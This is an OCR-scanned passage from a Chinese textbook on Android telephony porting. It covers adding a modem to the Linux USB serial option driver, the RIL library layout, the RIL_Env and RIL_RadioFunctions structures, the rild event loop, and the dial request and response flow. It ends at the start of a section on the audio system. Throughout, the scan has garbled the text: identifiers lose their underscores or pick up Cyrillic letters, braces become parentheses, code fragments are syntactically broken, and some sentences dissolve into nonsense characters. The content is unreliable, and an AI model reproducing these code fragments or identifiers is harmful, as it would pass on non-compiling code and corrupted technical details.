能 可 以 通过 文件 drivers/usb/serial/option.c 实现 ， 首 先 需 要 定义 下 面 的 option. Iport device 设备 。 具 体 代码 如 
下 所 示 。 

static struct usb_serial_driver option_1port device ={ 

.driver ={ 
.owner = THIS MODULE, 
лате = "option1", 


) 
description = "GSM modem (1-port)", 
.usb driver = &option driver, 
Ја table = option ids, 
.num ports = 1, 
.probe = option probe, 
.open = usb wwan open, 
.close = usb wwan close, 
.dtr rts = usb wwan dtr rts, 
.Write = usb wwan write, 
.Write room = usb wwan write room, 
.chars in buffer = usb wwan chars in buffer, 
.Set termios = usb wwan set termios, 
.tiocmget = usb wwan tiocmget, 
.tiocmset = usb wwan tiocmset, 
„ioctl = usb wwan ioctl, 
.attach = usb wwan startup, 
.disconnect = usb wwan disconnect, 
release = usb wwan release, 
.read int callback = option instat callback, 
#ifdef CONFIG PM 
.suspend = usb wwan suspend, 
resume = usb wwan resume, 
#endif 


k 
上 述 驱 动 会 通过 option init 注册 成 为 usb_serial_driver， 然 后 通过 对 usb driver 注册 来 响应 USB 设备 枚 
举 ， 对 应 的 USB Driver 如 下 。 
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static struct usb driver option driver = ( 
.name = "option", 
.probe = usb serial probe, 
.disconnect = usb serial disconnect, 
#ifdef CONFIG PM 
.suspend = usb serial suspend, 
.resume = usb serial resume, 
.supports autosuspend = 1, 
#endif 
Ја table = option ids, 
.no dynamic id = 1, 


i 
为 了 匹配 在 上 述 枚 举 中 定义 的 设备 ， 需 要 定义 WENDOR ID 和 PRODUCT ID。 在 文件 option.c 中 已 经 
定义 了 很 多 可 以 支持 的 设备 ， 现 只 需 在 数据 中 添加 设备 105 即 可 。 数 组 option_ids[ ] 的 代码 如 下 所 示 。 
static const struct usb device id option ids[] = ( 
(USB DEVICE(OPTION VENDOR ID, OPTION PRODUCT COLT) }, 
(USB DEVICE(OPTION VENDOR ID, OPTION PRODUCT RICOLA) }, 
(USB DEVICE(OPTION VENDOR ID, OPTION PRODUCT RICOLA LIGHT) }, 
(USB DEVICE(OPTION VENDOR ID, OPTION PRODUCT RICOLA QUAD)), 
(USB DEVICE(OPTION VENDOR ID, OPTION PRODUCT RICOLA QUAD LIGHT) }, 
(USB DEVICE(OPTION VENDOR ID, OPTION PRODUCT RICOLA NDIS), 


可 以 定义 两 个 需要 的 ID， 按照 下 面 的 格式 将 其 添加 到 上 述 option ids[ ] 数 组 中 。 
(USB DEVICE(XXX VENDOR ID, XXX_PRODUCT_RICOLA_LIGHT) }, 
上 述 代码 中 的 加 粗 部 分 是 定义 的 ID 内 容 。 
此 时 开启 Modem 电源 后 ， 会 出 现 两 个 分 别名 为 /dev/ttyusb0 和 /dev/ttyusb1 的 端口 。 


ТЛА КІ 接口 


1. RIL 目录 分 析 


(1) 目录 hardware/ril/libril 
目录 hardware/ril/libril 下 的 代码 负责 与 上 层 客户 进程 进行 交互 。 在 接收 到 客户 进程 命令 后 ， 调 用 相应 函 
数 进行 处 理 ， 然 后 将 命令 响应 结果 传 回 客户 进程 。 在 收 到 来 自 网 络 端的 事件 后 ， 也 传 给 客户 进程 。 
O 文件 ril_ commands.h: 列 出 了 telephony 可 以 接收 的 命令 、 每 个 命令 对 应 的 处 理 函 数 以 及 命令 响应 的 
处 理 函数 。 例 如 下 面 的 代码 。 
(RIL REQUEST GET SIM STATUS, dispatchVoid, responseSimStatus), 
(RIL REQUEST ENTER SIM PIN, dispatchStrings, responselnts), 
(RIL REQUEST ENTER SIM РОК, dispatchStrings, responselnts}, 
(RIL REQUEST ENTER SIM PIN2, dispatchStrings, responselnts), 
(RIL REQUEST ENTER SIM PUK2, dispatchStrings, responselnts), 
(RIL REQUEST CHANGE SIM PIN, dispatchStrings, responselnts), 


口 文件 ril_unsol commands.h: 列 出 了 telephony 可 以 接收 的 事件 类 型 和 对 每 个 事件 的 处 理 函 数 ， 例 如 
下 面 的 代码 。 

(RIL UNSOL RESPONSE RADIO STATE CHANGED, responseVoid, WAKE. PARTIAL), 

(RIL UNSOL RESPONSE CALL STATE CHANGED, responseVoid, WAKE. PARTIAL), 

(RIL UNSOL RESPONSE NETWORK STATE. CHANGED, responseVoid, WAKE. PARTIAL), 
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(RIL UNSOL RESPONSE NEW SMS, responseString, WAKE PARTIAL), 
(RIL UNSOL RESPONSE NEW SMS STATUS REPORT, responseString, WAKE PARTIAL), 
(RIL UNSOL RESPONSE NEW SMS ON SIM, responselnts, WAKE PARTIAL), 


O 文件 ril_event.h/cpp: 实现 了 处 理 与 事件 源 (端口 ，modem 等 ) 相关 的 功能 。ril_event loop 监视 所 有 
注册 的 事件 源 ， 当 某 事 件 源 有 数据 到 来 时 ， 相 应 事件 源 的 回调 函数 被 触发 firePending -> 
ev->func()) 。 

a чар cpp 功能 较为 庞大 ， 各 个 部 分 的 具体 功能 如 下 所 示 。 

RIL_register() 函数 : 打开 监听 端口 ， 接 收 来 自 пееме Cs fdListen = 
android get control socket(SOCKET NAME RIL);) ， 当 与 某 客户 进程 连接 建立 时 ， 调 用 
listenCallback() 函 数 ， 创 建 一 单独 线程 监视 并 处 理 所 有 事件 源 (通过 ril_event_loop)。 

> іѕіепСаПаск() 0: 当 与 客户 进程 连接 建立 时 ， 此 函数 被 调用 。 此 函数 接着 调用 
processCommandsCallback() 处 理 来 自 客户 进程 的 命令 请 求 。 

> processCommandsCallback0) 函 数 : 具体 处 理 来 自 客户 进程 的 命令 请 求 。 对 每 一 个 命令 ， 
ril_commands.h 中 都 规定 了 对 应 的 命令 处 理 函 数 (dispatchXXX) ，processCommandsCallback 
会 调用 这 个 命令 处 理 函数 进行 处 理 。 

> dispatch 系列 函数 : 此 函数 接收 来 自 客户 进程 的 命令 与 相应 参数 , 并 调用 onRequest0 进 行 处 理 。 

> —RIL_onUnsolicitedResponse()M 0: 将 来 自 网 络 端的 事件 封装 〈 通 过 调用 responseXXX) Jatt 
给 客户 进程 。 

>  RIL onRequestComplete) PAZ: 将 命令 的 最 终 响 应 结构 封装 〈 通 过 调用 responseXXX) 后 传 
给 客户 进程 。 

> response 系列 函数 :对 每 一 个 命令 ,都 规定 了 一 个 对 应 的 response 函数 来 处 理 命令 的 最 终 响 应 ; 
对 每 一 个 网 络 端的 事件 ， 也 规定 了 一 个 对 应 的 response 函数 来 处 理 此 事件 。response 函数 可 
被 onUnsolicitedResponse() 或 者 onRequestComplete()i/ H] . 

(2) 目录 hardware/ril/reference-ril 
在 此 目录 下 的 代码 主要 负责 与 Modem 进行 交互 。 
口 文件 reference-ril.c: 此 文件 的 核心 是 函数 onRequest() 和 onUnsolicited()。 

> ”onRequest() 函 数 : 在 这 个 函数 里 ， 每 一 个 RIL_REQUEST_XXX 请 求 都 被 转化 成 相应 的 AT 
command， 发 送 给 modem， 然 后 睡眠 等 待 。 当 收 到 此 AT command 的 最 终 响 应 后 ， 线 程 被 唤 
醒 ， 将 响应 传 给 客户 进程 (RIL_onRequestComplete -> sendResponse) 。 

> onUnsolicited0 函 数 : 这 个 函数 处 理 modem 从 网 络 端 收 到 的 各 种 事件 ， 如 网 络 信号 变化 、 拨 入 
的 电话 、 收 到 短信 等 ,然后 将 时 间 传 给 客户 进程 (RIL_onUnsolicitedResponse -> sendResponse)。 

O 文件 atchannel.c: 负责 向 modem 读 写 数据 。 其 中 ， 写 数据 〈 主 要 是 AT command) 功能 运行 在 主线 程 
中 ， 读 数据 功能 运行 在 一 个 单独 的 读 线程 中 。 此 文件 的 核心 功能 是 函数 at_send_command_ 
full_nolock(), 此 函数 运行 在 主线 程 中 , 用 于 将 一 个 AT command 命 令 写 入 modem 后 进入 睡眠 状态 (使 
用 pthread_cond_wait 或 类 似 函 数 ), 直到 modem 读 线程 将 其 唤醒 。 唤醒 后 此 函数 获得 了 AT command 
的 最 终 响 应 并 返回 。 函 数 readerLoop0 运 行 在 一 个 单独 的 读 线程 中 ， 负 责 从 modem 中 读 取 数据 。 读 
到 的 数据 可 分 为 3 种 类 型 : 网 络 端 传 入 的 事件 : modem 对 当前 AT command 的 部 分 响应 ; modem 对 当 
前 AT command 的 全 部 响应 。 对 第 3 种 类 型 的 数据 САТ command 的 全 部 响应 ) ， 读 线程 唤醒 

(pthread cond signal) 睡眠 状态 的 主线 程 。 

O 文件 at_tok.c: 提供 AT 响应 的 解析 函数 。 

口 文件 misc.c: 只 提供 一 个 字符 串 匹配 函数 。 
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(3) 目录 hardware/ril/rild 
在 此 目录 下 的 代码 主要 是 为 了 生成 rild 和 radiooptions 的 可 执行 文件 。 
口 文件 radiooptions.c: 用 于 生成 radiooptions 的 可 执行 文件 ，radiooptions 程 序 仅仅 是 把 命令 行 参数 传 
递 给 socket{rild-debug} 处理， 从 而 达到 与 rild 通 信 ， 可 供 调试 时 配置 Modem 参 数 。 
O 文件 rild.c: 用 于 生成 rild 的 可 执行 文件 。 


2. RIL 接口 移植 


实现 RIL 接口 的 过 程 比较 复杂 ， 复 杂 程 度 主要 体现 在 维护 工作 、 需 要 处 理 的 命令 和 较 多 结构 体 上 。 在 
文件 hardware/ril/include/telephony/riLh 中 定义 了 RIL 接口 ， 并 且 同 一 个 目录 下 的 ril cdma_sms.h 作为 对 
CDMA 协议 的 有 利 补充 而 存在 。 

在 文件 rilh 中 首先 定义 核心 结构 RIL_Env， 具 体 代码 如 下 所 示 。 

struct RIL_Env { 

/请 求 完成 
void (*OnRequestComplete)(RIL Token t, RIL Errno e, 
void *response, size t responselen); 


/上 报 消息 响应 

void (*OnUnsolicitedResponse)(int unsolResponse, const void *data, 
size t datalen); 

/请 求 中 进行 周期 处 理 


void (*RequestTimedCallback) (RIL_TimedCallback callback, 
void *param, const struct timeval *relativeTime); 


y 
上 述 结 构 体 是 由 libril.so 库 作为 标准 实现 的 ， 可 以 为 硬件 抽象 层 的 实现 库 调用 。 能 够 在 发 生 请 求 时 针 

对 不 同 的 情况 作出 具体 响应 ， 例 如 ， 有 请 求 完成 函数 响应 、 上 报信 息 函数 响应 和 请 求 中 周期 处 理 函数 3 
个 响应 。 

在 结构 体 RIL_RadioFunctions 中 定义 需要 的 函数 指针 ， 具 体 代码 如 下 所 示 。 

typedef void (*RIL_RequestFunc) (int request, void *data, 

size tdatalen, RIL Token t); 

typedef RIL_RadioState (*RIL RadioStateRequest)(); 

typedef int (*RIL_Supports)(int requestCode); 

typedef void (*RIL_Cancel)(RIL_Token t); 

typedef void (*RIL TimedCallback) (void *param); 

typedef const char * (*RIL GetVersion) (void); 


typedef struct ( 
int version; 
RIL_RequestFunc onRequest; 
RIL_RadioStateRequest onStateRequest; 
RIL. Supports supports; 
RIL. Cancel onCancel; 
RIL_GetVersion getVersion; 
} RIL_RadioFunctions; 
RIL 实现 库 需 要 实现 结构 体 RIL_RadioFunctions 中 的 内 容 ， 当 通过 RIL_Init 返回 rild Ja, rild 会 调用 下 
面 的 函数 完成 注册 。 
void RIL_register (const RIL_RadioFunctions *callbacks); 
此 时 成 功 搭建 了 rild 到 RIL 的 实现 库 的 请 求 发 送 路 径 和 响应 路 径 。 
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71.5 分析 电话 系统 的 实现 流程 


通过 本 章 前 面 内 容 的 学 习 ， 了 解 了 Android 电话 系统 的 基本 结构 和 移植 方法 。 在 本 节 的 内 容 中 , 将 简要 
介绍 Android 电话 系统 的 实现 流程 。 在 Android 系统 中 ， 拨 打 电 话 的 基本 流程 如 图 7-3 所 示 。 
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图 7-3 拨打 电话 的 流程 
1. 初始 启动 流程 


主 入 口 功 能 是 通过 文件 rild.c 中 的 main() 函 数 实现 的 ， 这 个 过 程 主要 完成 如 下 3 个 任务 。 
(1) 开启 libril.so 中 的 event 机 制 ， 这 是 在 函数 RIL_startEventLoop0 中 实现 的 ， 是 最 核心 的 由 多 路 VO 

驱动 的 消息 循环 。 

此 任务 的 核心 内 容 是 通过 RIL_startEventLoop() 函 数 实现 的 ， 此 函数 在 文件 ril.cpp 中 实现 ， 其 主要 目的 
是 通过 pthread create(&s tid dispatch, &attr, eventLoop, NULL) 建 立 一 个 dispatch 线程 , 入 口 点 在 eventLoop。 
而 在 eventLoop 中 会 调 ril_event.cpp 中 的 fil_event_loop0 函 数 ， 以 建立 起 消息 (event) 队列 机 制 。 接 下 来 看 
上 述 消息 队列 的 机 制 ， 实 现代 码 都 在 文件 ril event.cpp 中 ， 主 要 代码 如 下 所 示 。 

void ril_event_init(); 

void ril event set(struct ril event * ev, int fd, bool persist, ril event cb func, void * param); 

void ril event add(struct ril event * ev); 

void ril timer add(struct ril event * ev, struct timeval * tv); 

void ril event del(struct ril event * ev); 


ED 
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void ril event loop(); 

struct ril event ( 

struct ril event *next; 

struct ril event *prev; 

int fd; 

int index; 

bool persist; 

struct timeval timeout; 

ril event cb func; 

void *param; 

每 个 ril_event 结构 都 与 一 个 fd 句柄 绑 定 〈 可 以 是 文件 、socket、 管 道 等 ) ， 并 且 带 一 个 func 指针 去 执 
行 指定 的 操作 。 具 体 流程 是 ， 当 完成 ril_event_init Ja, Wit ril event_set0 配 置 一 个 新 ril_event， 并 通过 
ril event add 加 入 队列 之 中 (通常 用 rilEventAddWakeup 来 添加 ) ，add 会 把 队列 里 所 有 ril. event 的 fd, Ji 
AA fd RE readFds 中 。 这 样 ril_event_loop() 能 通过 一 个 多 路 复 用 IO 的 机 制 (select) 来 等 待 这 些 fd, ШІ 
果 任 何 一 个 fd AGRESA, 则 进入 分 析 流 程 processTimeouts()、processReadReadies(&rfds, n) 和 firePending()。 
下 文 会 详细 分 析 这 些 流程 。 

在 进入 ril_event_loop() 之 前 ， 通 过 pipe 机 制 实现 挂 入 了 一 个 s wakeupfd_event， 这 个 event 的 目的 是 可 
以 在 某 些 情况 下 能 内 部 唤醒 ril_event_loop0 的 多 路 复 用 阻塞 ， 例 如 一 些 带 timeout 的 命令 到 期 时 。 

到 此 为 止 ， 第 一 个 任务 分 析 完 毕 ， 这 样 便 建立 起 了 基于 event 队列 的 消息 循环 ， 稍 后 便 可 以 接受 上 层 发 
来 的 请 求 了 《〈 上 层 请 求 的 event 对 象 建立 ， 在 第 3 个 任务 中 ) 。 

(2) 初始 化 librefrence rilso， 也 就 是 跟 硬件 或 模拟 硬件 modem 通信 的 部 分 〈 后 面 统一 称 硬 件 ) ， ЖШ 

过 RIL_Init() 函 数 完成 。 

此 任务 的 入 口 是 RIL_Init(), RIL_Init() 首 先 通 过 参数 获取 硬件 接口 的 设备 文件 或 模拟 硬件 接口 的 socket, 
然后 新 开 一 个 线程 继续 初始 化 处 理 ， 即 mainLoop 循环 处 理 。 

mainLoop 的 主要 任务 是 建立 起 与 硬件 的 通信 ， 然 后 通过 read() 方 法 阻塞 等 待 硬件 的 主动 上 报 或 响应 。 
在 注册 一 些 基础 回调 (timeout,readerclose) 后 ，mainLoop 将 首先 打开 硬件 设备 文件 , 建立 起 与 硬件 的 通信 ， 
s device path 和 s_port 是 前 面 获 取 的 设备 路 径 参数 , 在 此 将 其 打开 。 两 者 可 以 同时 打开 并 拥有 各 自 的 reader, 
由 此 可 见 很 容易 添加 双 卡 双 待 等 支持 。 

接 下 来 通过 at_open() 函 数 建立 起 这 一 设备 文件 上 的 reader 等 待 循环 ， 此 功能 是 通过 新 建 一 个 线程 的 方 
式 完 成 的 ， 新 建 线程 的 代码 如 下 所 示 。 

ret = pthread create(&s tid reader, &attr, readerLoop, &attr) 

此 线程 的 入 口 点 是 readerLoop 

因为 AT 命令 都 是 以 m 或 nr 的 换行 符 作为 分 隔 符 的 , 所 以 readerLoop 是 line 驱动 的 , 除非 发 错 或 超时 ， 
和 否则 会 读 到 一 行 完整 的 响应 或 主动 上 报时 才 会 返回 。 这 个 循环 跑 起 来 以 后 , 已 经 建立 了 基本 的 AT 响应 机 制 。 

有 了 响应 的 机 制 后 ， 就 可 以 通过 如 下 代码 在 initializeCallback 中 执行 一 些 Modem 的 初始 化 命令 ， 主 要 
都 是 AT 命令 的 方式 。 

RIL_requestTimedCallback(initializeCallback, NULL, &TIMEVAL 0) 

(3) 通过 RIL Init 获取 一 组 函数 指针 RIL_RadioFunctions， 并 通过 RIL register 完成 注册 ， 并 打开 接受 


上 层 命令 的 socket 通道 。 

此 任务 是 由 RIL_Init 的 返回 值 开始 的 , 这 是 一 个 RIL_RadioFunctions 结构 的 指针 。 此 指针 的 定义 代码 如 
下 所 示 。 

typedef struct { 

int version; M&E RIL VERSION */ 
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RIL_RequestFunc onRequest; 

RIL_RadioStateRequest onStateRequest; 

RIL_Supports supports; 

RIL_Cancel onCancel; 

RIL_GetVersion getVersion; 

} RIL_RadioFunctions; 

上 述 指针 中 最 重要 的 是 onRequest 域 ， 上 层 来 的 请 求 都 由 这 个 函数 进行 映射 后 转换 成 对 应 的 AT 命令 发 
送 给 硬件 。rild 通过 RIL register 注册 这 一 指针 。 

在 RIL register 中 还 需要 完成 另外 一 个 任务 ， 就 是 打开 前 面 提 到 的 与 上 层 通信 的 socket 接口 (s_fdListen 
是 主 接口 ，s_fdDebug 供 调试 时 使 用 ) 。 然 后 将 这 两 个 socket 接口 使 用 任务 CIO 中 实现 的 机 制 进行 注册 ( 仅 
列 出 s 人 faListen) ， 对 应 代码 如 下 所 示 。 

ril event set (&s listen event, s fdListen, false, 

listenCallback, NULL); 

rilEventAddWakeup (&s listen event); 

这 样 将 两 个 socket 加 到 任务 G) 中 建立 起 来 的 多 路 复 用 VO 的 检查 句柄 集合 中 ， 一 旦 有 上 层 来 的 〈 调 
W) 请 求 ，event 机 制 便 能 响应 处 理 了 。 到 此 为 止 ， 启 动 流程 全 部 介绍 完毕 。 


2. request 流程 


(1) 多 路 复 用 VO 机 制 的 运转 
request 接收 是 通过 ril event loop 中 的 多 路 复 用 VO 实现 的 ， 其 中 使 用 гїї event. set 来 配置 一 个 event, 
此 处 主要 有 如 下 两 种 event。 
O ril event add: 添加 使 用 多 路 IO 的 event， 负 责 将 其 挂 到 队列 ， 同 时 将 event 的 通道 句柄 人 乌 加 入 到 
watch_table， 然 后 通过 select 进 行 等 待 。 
口 ril timer add: 添加 timer event， 将 其 挂 在 队列 ， 同 时 重新 计算 最 短 超 时 时 间 。 
无 论 是 哪 一 种 add， 最 终 都 会 调用 triggerEvLoop 来 刷新 队列 ， 并 更 新 超时 值 或 等 待 对 象 。 在 刷新 之 后 ， 
ril event. loop 从 阻塞 的 位 置 使 用 select 返回 。 此 时 只 有 两 种 可 能 : 一 是 超时 ， 二 是 等 待 到 了 某 IO 操作 。 
О 超时 处 理 ， 在 processTimeouts 中 完成 ， 需 要 摘 下 超时 的 event 并 将 其 加 入 pending_list.。 
O 检查 有 1/O 操 作 的 通道 的 处 理 ， 在 processReadReadies 中 完成 ， 需 要 将 超时 的 event 加 入 pending_list。 
在 firePending 中 检索 pending list 的 event 并 依次 执行 event->func。 当 完成 上 述 操作 之 后 ， 计 算 新 的 超 
时 时 间 ， 并 重新 select (选择 ) 阻塞 于 多 路 VO. 
在 初始 化 完成 以 后 ， 会 在 队列 上 挂 如 下 3 个 event 对 。 
口 s_listen_event: 名 为 rild 的 socket， 主 要 使 用 request & response 通 道 实现 。 
口 5 debug event: 名 为 rild-debug 的 socket， 调 试用 request & response 通 道 ， 其 流程 与 s_listen_event 基 
本 相同 。 
口 s_wakeupfd_ event: 是 一 个 无 名 管道 ， 用 于 队列 主动 唤醒 。 
(2) request 的 传 入 和 dispatch 
上 层 部 分 的 核心 代码 保存 在 如 下 文件 中 。 
frameworks/base/telephony/java/com/android/internal/telephony/gsm/RIL.java 
此 文件 是 Android Java 框架 处 理 radio(gsm) 的 核心 组 件 ， 首 先 看 里 面 的 函数 dial0， 代 码 如 下 所 示 。 
ublic void 
Em (String address, int clirMode, Message result) 


RiLRequest rr = RiLRequest.obtain(RIL REQUEST DIAL, result); 
rr.mp.writeString(address); 
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rr.mp.writelnt(clirMode); 
if(RILJ LOGD) riljLog(rr.serialString() + "> " + requestToString(rr.mRequest)); 
send(rr); 


} 

在 上 述 代码 中 ，rr 是 以 RIL_REQUEST_DIAL у request 号 而 申请 的 一 个 RILRequest 对 象 ， 此 request 
IFTE Java HEXA rild 库 中 共享 .在 RILRequest 初 始 化 时 ,会 连接 名 为 rild 的 socket( 也 就 是 rild 中 s_listen_event 
绑 定 的 socket) 。 

在 Android 系统 中 ，rr.mp 是 一 个 Parcel 对 象 ，Parcel 是 一 套 简单 的 序列 化 协议 ， 用 于 将 对 象 或 对 象 的 
成 员 序列 化 成 字 节 流 ， 以 供 传递 参数 之 用 。 在 此 可 以 看 到 String address 和 int clirMode 都 是 将 依次 序列 化 的 
成 员 。 在 之 前 rr 初始 化 时 ，request 号 与 request 的 序列 号 已 经 成 为 头 两 个 将 被 序列 化 的 成 员 ， 这 为 后 面 的 
request 解析 打下 了 基础 。 

send 到 handleMessage 的 流程 比较 简单 ，send 会 将 rr 直接 传递 给 另 一 个 线程 的 handleMessage， 目 的 是 
执行 data = rr.mp.marshall0) 序 列 化 操作 ， 并 将 data 字 节 流 写 入 到 rild socket. 

如 果 此 时 返回 rild, select 会 发 现 rild socket 有 了 请 求 连接 的 信号 ， 这 会 导致 s listen event. 被 挂 入 
pending_list， 从 而 执行 event->funce， 即 执行 下 面 的 代码 。 

static void listenCallback (int fd, short flags, void *param); 

接 下 来 运行 下 面 的 代码 以 获取 传 入 的 socket 描述 符 。 

s_fdCommand = accept(s_fdListen, (sockaddr *) &peeraddr, &socklen) 

然后 通过 record_stream_new 建立 起 一 个 record stream 将 其 与 s fdCommand 绑 定 , 在 此 无 需 关注 record. stream 
的 具体 流程 ， 只 需 关 注 command event 回调 和 processCommandsCallback() 函 数 即 可 。 从 前 面 的 event 机 制 分 
析 可 以 得 出 ， 一 旦 s_fdCommand 上 有 数据 ， 此 回调 函数 就 会 被 调用 。 

processCommandsCallback 通过 record stream get next 阻塞 读 取 s_ fdCommand 上 发 来 的 数据 ， 直 到 收 到 一 
个 完整 的 request (request 包 的 完整 性 由 record stream 的 机 制 保证 ) 为 止 , 然后 将 其 送 达 processCommandBuffer。 

进入 processCommandBuffer 以 后 就 说 明正 式 进入 了 命令 的 解析 部 分 ， 每 个 命令 将 以 RequestInfo 的 形式 
存在 。 对 应 代码 如 下 所 示 。 

typedef struct Requestinfo { 

int32_t token; 

Commandinfo *pCI; 

struct Requestinfo *p next; 

char cancelled; 

char local; 

} Requestinfo; 

此 处 的 pPRI 是 一 个 RequestInfo 结构 指针 ， 在 上 层 和 rild 之 间 的 request 号 是 统一 的 ， 在 文件 til.cpp HE 
义 了 这 个 号 。 对 应 代码 如 下 所 示 。 

static Commandinfo s commands[ ] = { 

#include "ril commands.h" 


y 

在 定义 时 包含 了 一 个 ril_commands.h 的 枚 举 。pRI 直接 访问 数组 s_ commands[ ] 以 获取 自己 的 pCI, 这 是 
-个 CommandInfo 结构 ， 定 义 代码 如 下 所 示 。 

typedef struct { 

int requestNumber; 

void (*dispatchFunction) (Parcel &p, struct Requestinfo *pRI); 

int(*responseFunction) (Parcel &p, void *response, size t responselen); 

} Commandinfo; 
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(3) request 的 详细 解析 

对 于 dial 而 言 ，CommandInfo 结构 的 初始 化 是 通过 如 下 代码 实现 的 。 

(RIL REQUEST DIAL, dispatchDial, responseVoid}, 

在 上 述 过 程 中 通过 dispatehFunction 执行 了 dispatchDial0 函 数 ， 可 以 看 到 其 实 有 很 多 种 类 的 dispatch- 
function， 例 如 dispatchVoid、dispatchStrings、dispatchSIM_IO 等 。 这 些 函 数 的 区 别 在 于 Parcel 传 入 的 参数 
形式 ， 其 中 Void 就 是 不 带 参 数 的 ，Strings 是 以 string[ ] 做 参数 。 

当 拥 有 request 号 和 参数 后 ， 就 可 以 进行 具体 的 request0 函 数 调用 了 ， 是 通过 如 下 代码 实现 的 。 

s_callbacks.onRequest(pRI->pCl->requestNumber, xxx, len, pRI) 

s_callbacks 是 获取 自 libreference-ril 的 RIL_RadioFunctions 结构 指针 ，request 请 求 在 这 里 转 入 底层 的 
libreference-ril 处 理 ，handler 是 reference-ril.c 中 的 onRequest。 

onRequest 进行 一 个 简单 的 switch 分 发 ，RIL_REQUEST_DIAL 的 基本 流程 如 下 所 示 。 

onRequest->requestDial—>at_send_command—>at_send command full-»at send_command_full_nolock-->writeline 

在 requestDial 中 将 命令 和 参数 转换 成 对 应 的 AT 命令 ， 然 后 调用 公共 send command 接口 
at_send_command。 除 了 这 个 接口 之 外 ， 还 有 如 下 常用 的 接口 。 


at send command singleline 
at send command sms 
at send command multiline 


接 下 来 需要 执行 at_send_command full， 前 面 的 儿 个 接口 都 会 最 终 到 这 里 为 止 ， 然 后 通过 一 个 互 斥 的 
at send command full nolock 调用 来 完成 最 终 的 写 出 操作 。 


3. response 流程 


通过 前 面 的 request 流程 ， 终 止 了 at send command full nolock 里 的 writeline 操作 ， 因 为 这 里 完成 命令 
写 出 到 硬件 设备 的 操作 ， 接 下 来 就 是 等 待 硬件 响应 ， 也 就 是 response yea T. 

在 实现 response 获取 信息 时 ， 在 readerLoop 中 用 readlineO) 函 数 以 “ 行 ”为 单位 接收 信息 。AT 主要 有 如 
下 两 种 response 方式 。 

о 主动 上 报 : 例如 ， 网 络 状态 、 短 信和 来 电 等 都 不 需要 经 过 请 求 ， 此 方式 用 unsolicited 来 专门 描述 。 

口 真正 意义 上 的 response: 即 命令 的 响应 。 

此 时 可 以 看 到 所 有 的 “ 行 ”都 是 经 过 SMS 自动 上 报 筛选 的 ， 因 为 短信 的 AT 处 理 通常 比较 麻烦 ， 无 论 
收发 都 单独 列 出 。 这 里 是 因为 要 即时 处 理 这 条 短信 消息 〈 两 行 ， 标 志 +pdu) ， 而 不 能 拆 开 处 理 。 处 理 函 数 
是 onUnsolicited() 。 

除 SMS 特例 ， 所 有 的 line 都 要 经 过 processLine 处 理 。 来 看 看 下 面 的 流程 。 

processLine 

|——по cmd 一 >handleUnsolicited NEIER 

|——isFinalResponseSuccess-—>handleFinalResponse ”// 成 功 ， 标 准 响 应 

|——isFinalResponseError-—>handleFinalResponse /失败 ， 标 准 响应 

|--get'> 一 ->send sms pdu MEE “>” FS, BIE sms 数据 再 继续 等 待 响应 

|——switch s_type—->2 (hI RY // 命 令 有 具体 的 响应 信息 需要 对 应 分 析 

在 此 需要 重点 关注 handleUnsolicited 自动 上 报 和 switch s type 具体 响应 信息 ， 另 外 ， 具 体 响应 需要 
handleFinalResponse 这 样 的 标准 响应 来 最 终 完成 。 

(1) onUnsolicite (主动 上 报 响 应 ) 

onUnsolicite 的 实现 函数 如 下 。 

static void onUnsolicited (const char *s, const char *sms_pdu); 

response 的 主要 解析 过 程 是 由 文件 at_tok.c 中 的 函数 完成 的 ， 其 实 就 是 字符 串 按 块 解析 ， 具 体 的 解析 方 
式 由 每 条 命令 或 上 报信 息 自 行 决定 。onUnsolicited 只 解析 出 头 部 (一 般 是 +XXXX 的 形式 ) ， 然 后 按 类 型 决 
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定 下 一 步 操作 ， 操 作 方式 有 RIL_onUnsolicitedResponse 和 RIL requestTimedCallback 两 种 。 

О RIL onUnsolicitedResponse 

将 unsolicited 信息 直接 返回 给 上 层 。 通 过 Parcel 传递 , 将 RESPONSE_UNSOLICITED, unsolResponse 

(request 号 ) 写 入 Parcel， 然 后 通过 s_unsolResponses 数组 查找 到 对 应 的 responseFunction 完成 进一步 的 解 

析 ， 存 入 Parcel 中 。 最 终 通过 sendResponse 将 其 传递 回 原 进 程 。 具 体 流 程 如 下 所 示 。 

sendResponse-->sendResponseRaw-->blockingWrite—>write to s_fdCommand 

О RIL requestTimedCallback 

通过 event 机 制 实现 的 timer 机 制 ， 回 调 对 应 的 内 部 处 理 函 数 。 通 过 internalRequestTimedCallback 将 回 
调 添加 到 event 循环 , 最 终 完 成 callback 上 挂 的 函数 的 回调 。 例如 , pollSIMState 和 onPDPContextListChanged 
等 回调 不 用 返回 上 层 ， 直 接 在 内 部 处 理 即 可 实现 。 

(2) switch s_type 命令 的 具体 响应 及 handleFinalResponse 标准 响应 

命令 类 型 (s_type) 在 发 送 命令 时 设置 , 具体 有 NO RESULT. NUMERIC, SINGLELINE 和 MULTILINE 
儿 种 类 型 供 不 同 的 AT 使 用 。 这 几 个 类 型 的 解析 方式 类 似 ， 通 过 比较 AT 头 标记 等 判断 处 理 ， 如 果 是 对 应 的 
响应 ， 就 通过 addIntermediate 挂 到 一 个 临时 结果 sp_response->p_intermediates 队列 里 。 如 果 不 是 对 应 响应 ， 
那 其 实 应 该 是 穿插 其 中 的 自动 上 报 ， 用 onUnsolicite 来 处 理 。 具 体 响 应 只 是 起 了 一 个 获取 响应 信息 到 临时 的 
结果 ， 需 要 等 待 具体 分 析 的 作用 。 无 论 有 无 具体 响应 ， 最 终 都 以 标准 响应 handleFinalResponse 来 完成 ， 也 
就 是 一 直接 受到 OK. ERROR 等 标准 response 来 结束 ， 这 是 大 多 数 AT 命令 的 规范 。 


72 分析 Android 音频 系统 


E 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 7 章 \ 分 析 Android 音频 系统 .avi 
在 Android 设备 中 进行 通话 时 需要 音频 系统 的 支持 , 在 建立 通话 模式 时 会 调用 音频 系统 实现 无 线 通 话 功 
能 。 本 节 将 详细 讲解 Android 音频 系统 的 基本 知识 ， 为 读者 学 习 本 书后 面 的 知识 打下 基础 。 


724 ”音频 系统 结构 


Android 音频 系统 对 应 的 硬件 设备 有 音频 输入 和 音频 输出 两 部 分 ， 手 机 中 的 输入 设备 通常 是 话 简 ， 输 出 
设备 通常 是 耳机 和 扬声器 。Android 音频 系统 的 核心 是 Audio 系统 ， 它 在 Android 中 负责 音频 方面 的 数据 流 
传输 和 控制 功能 ， 也 负责 音频 设备 的 管理 。Audio 部 分 作为 Android 的 Audio 系统 的 输入 /输出 层次 ， 一 般 负 
责 播 放 PCM 声音 输出 和 从 外 部 获取 PCM 声音 ， 以 及 管理 声音 设备 和 设置 。 

